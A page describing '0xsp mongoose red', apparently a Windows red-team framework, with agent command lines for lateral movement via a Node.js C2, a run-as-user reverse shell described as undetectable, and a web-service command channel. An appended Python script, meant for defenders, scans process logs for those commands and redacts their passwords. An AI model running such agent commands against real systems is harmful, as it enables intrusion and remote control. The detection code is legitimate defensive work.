0xsp mongoose red is a unique framework for cybersecurity simulation and red teaming operations, covering Windows auditing for newer vulnerabilities, misconfigurations and privilege escalation attacks. This version is provided to support cybersecurity simulation: with it you can audit a targeted Windows operating system for vulnerabilities, misconfigurations and privilege escalation attacks, and replicate the tactics and techniques of an advanced adversary in a network.
While the prior version focused on hunting for privilege escalation attacks and misconfigurations, the newer version has been extended to replicate the techniques of an adversary in a network. With Node.js support for the web application interface, the agent underwent a much-needed overhaul to present these options in an approachable way.
Once you start a mongoose agent, you can select a lateral movement technique with the -lr command, followed by supplying the required access credentials and the Node.js address, so that the command is passed directly from the C2 into the agent and then deployed on the targeted system.
agent.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost NodeJS-C2-IP
Connected devices and shares
One of the important enumeration strategies in a Windows environment is to retrieve all connected entities and available shares for a tested system.
Weaponization of run-as-user
While conducting a test on a system, you may be able to retrieve some account credentials and want to use them for verification or for escalation of privileges. With this feature, you can abuse the run-as-user function to establish an undetectable reverse shell from the tested system to your attacker machine.
agent.exe -r accountname password cmd.exe
[*] SET RHOST >
[*] SET RPORT >
Bidirectional communication channel (T1102.002)
This feature of 0xsp mongoose red is a means of sending commands to, and receiving output from, a compromised system over a web service channel.
agent.exe -cmd -srvhost NodeJSIP -x password
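All three agent invocations on this page (-lr with -password, -r with a positional password, -cmd with -x) pass a credential on the command line. Where command-line auditing is enabled (Windows Security event 4688 with process command line logging, or Sysmon process-creation events), those arguments are written to the process-creation log, which is both an exposure of the secret and a detection opportunity for the blue team. The following example is added here and is not part of the 0xsp mongoose red project: it scans process-creation records in a constructed log format (not any real product's format), flags command lines that carry a credential after one of the switches shown above, and redacts the secret before the record is forwarded. The switch list beyond -password, -x and -r is an assumption added for generality.

```python
import re
import shlex

# Switch -> offset of the credential token after it.
# "-password", "-x" and "-r <account> <password>" come from the agent usage
# on this page; the remaining spellings are assumptions added for generality.
SECRET_ARG_OFFSET = {
    "-password": 1,
    "--password": 1,
    "-pass": 1,
    "-pw": 1,
    "-x": 1,
    "-r": 2,   # "-r accountname password cmd.exe": password is the 2nd token after -r
}

# Constructed log format for this example (not a real product format):
#   <timestamp> host=<hostname> user=<user> parent=<parent image> cmd=<command line>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)

# Constructed sample records; the host, user and timestamps are invented.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z host=WS01 user=CORP\\jdoe parent=explorer.exe "
    "cmd=notepad.exe C:\\notes.txt",
    "2024-05-01T10:02:17Z host=WS01 user=CORP\\jdoe parent=cmd.exe "
    "cmd=agent.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost 10.0.0.5",
    "2024-05-01T10:03:40Z host=WS01 user=CORP\\jdoe parent=cmd.exe "
    "cmd=agent.exe -r accountname password cmd.exe",
    "2024-05-01T10:05:02Z host=WS01 user=CORP\\jdoe parent=cmd.exe "
    "cmd=agent.exe -cmd -srvhost 10.0.0.5 -x password",
]


def redact(cmdline):
    """Return (redacted command line, number of credential tokens replaced).

    Tokenised with posix=False because Windows command lines are not POSIX
    shell syntax (backslashes in paths must not be treated as escapes).
    """
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        tokens = cmdline.split()   # unbalanced quotes: fall back to whitespace split
    secret_positions = set()
    for i, tok in enumerate(tokens):
        offset = SECRET_ARG_OFFSET.get(tok.lower())
        if offset is not None and i + offset < len(tokens):
            secret_positions.add(i + offset)
    redacted = ["***" if i in secret_positions else t for i, t in enumerate(tokens)]
    return " ".join(redacted), len(secret_positions)


def find_cleartext_credentials(lines):
    """Parse process-creation records and return findings for lines that carried a credential."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue   # not a process-creation record in the expected format
        redacted_cmd, hits = redact(m.group("cmd"))
        if hits:
            findings.append({
                "ts": m.group("ts"),
                "host": m.group("host"),
                "user": m.group("user"),
                "parent": m.group("parent"),
                "cmd": redacted_cmd,   # safe to forward: secret values removed
                "secrets": hits,
            })
    return findings


if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} {f['user']} parent={f['parent']} "
              f"secrets={f['secrets']} cmd={f['cmd']}")
```

Run as a script, it reports the three agent invocations and leaves the notepad.exe record alone; the printed command lines contain `***` where the credential was. In a real pipeline the same redaction would sit between the collector and the SIEM so the secret is never stored, while the finding itself still fires an alert on the host and user that supplied a password as a process argument.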